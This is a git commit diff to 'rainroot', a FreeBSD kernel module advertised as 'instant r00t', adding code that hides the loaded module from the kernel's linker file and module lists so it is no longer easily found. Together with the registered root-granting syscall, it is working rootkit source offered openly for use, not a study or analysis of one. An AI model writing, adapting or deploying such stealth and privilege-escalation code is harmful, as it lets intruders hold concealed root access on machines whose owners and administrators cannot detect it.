version 0.2, added hidefunction so mod is not found anymore easily
This commit is contained in:
your-favorite-hacker
@@ -2,6 +2,10 @@
|
||||
instant r00t :)
|
||||
ancient code, time to publish
|
||||
by -
|
||||
|
||||
added code for hiding the module
|
||||
basic hide code was built some years back during reading
|
||||
BSD Rootkits by Joseph Kong, it is quite nice have a look!
|
||||
*/
|
||||
|
||||
#include <sys/types.h>
|
||||
@@ -15,7 +19,37 @@
|
||||
#include <sys/linker.h>
|
||||
#include <sys/libkern.h>
|
||||
#include <sys/sysproto.h>
|
||||
#include <sys/lock.h>
|
||||
#include <sys/mutex.h>
|
||||
#include <sys/_mutex.h>
|
||||
#include <sys/sx.h>
|
||||
|
||||
#include <vm/vm.h>
|
||||
#include <vm/vm_page.h>
|
||||
#include <vm/vm_map.h>
|
||||
|
||||
#define HIDEMOD "rainroot.ko"
|
||||
#define HIDE "rainroot"
|
||||
|
||||
extern linker_file_list_t linker_files;
|
||||
static struct mtx kld_mtx;
|
||||
extern int next_file_id;
|
||||
|
||||
typedef TAILQ_HEAD(,module) modulelist_t;
|
||||
extern modulelist_t modules;
|
||||
extern int nextid;
|
||||
|
||||
struct module {
|
||||
TAILQ_ENTRY(module) link;
|
||||
TAILQ_ENTRY(module) flink;
|
||||
struct linker_file *file;
|
||||
int refs;
|
||||
int id;
|
||||
char *name;
|
||||
modeventhand_t handler;
|
||||
void *arg;
|
||||
modspecific_t data;
|
||||
};
|
||||
|
||||
/*
|
||||
* The function for implementing the syscall.
|
||||
@@ -41,20 +75,38 @@ static int offset = NO_SYSCALL;
|
||||
static int
|
||||
load (struct module *module, int cmd, void *arg)
|
||||
{
|
||||
int error = 0;
|
||||
struct linker_file *lf;
|
||||
struct module *mod;
|
||||
mtx_init(&kld_mtx, "hide lock",NULL,MTX_DEF);
|
||||
mtx_lock(&Giant);
|
||||
mtx_lock(&kld_mtx);
|
||||
|
||||
switch (cmd) {
|
||||
case MOD_LOAD :
|
||||
printf ("call me at %d\n", offset);
|
||||
break;
|
||||
case MOD_UNLOAD :
|
||||
printf ("call me at %d\n", offset);
|
||||
break;
|
||||
default :
|
||||
error = EOPNOTSUPP;
|
||||
break;
|
||||
(&linker_files)->tqh_first->refs--;
|
||||
|
||||
TAILQ_FOREACH(lf, &linker_files,link)
|
||||
{
|
||||
if (strcmp(lf->filename,HIDEMOD)==0){
|
||||
next_file_id--;
|
||||
TAILQ_REMOVE(&linker_files,lf,link);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return error;
|
||||
}
|
||||
|
||||
mtx_unlock(&kld_mtx);
|
||||
mtx_unlock(&Giant);
|
||||
|
||||
sx_xlock(&modules_sx);
|
||||
|
||||
TAILQ_FOREACH(mod, &modules, link){
|
||||
if(strcmp(mod->name,HIDE)==0){
|
||||
nextid--;
|
||||
TAILQ_REMOVE(&modules,mod,link);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
sx_unlock(&modules_sx);
|
||||
|
||||
return(0);
|
||||
}
|
||||
SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);
|
||||
|
||||
Reference in New Issue
Block a user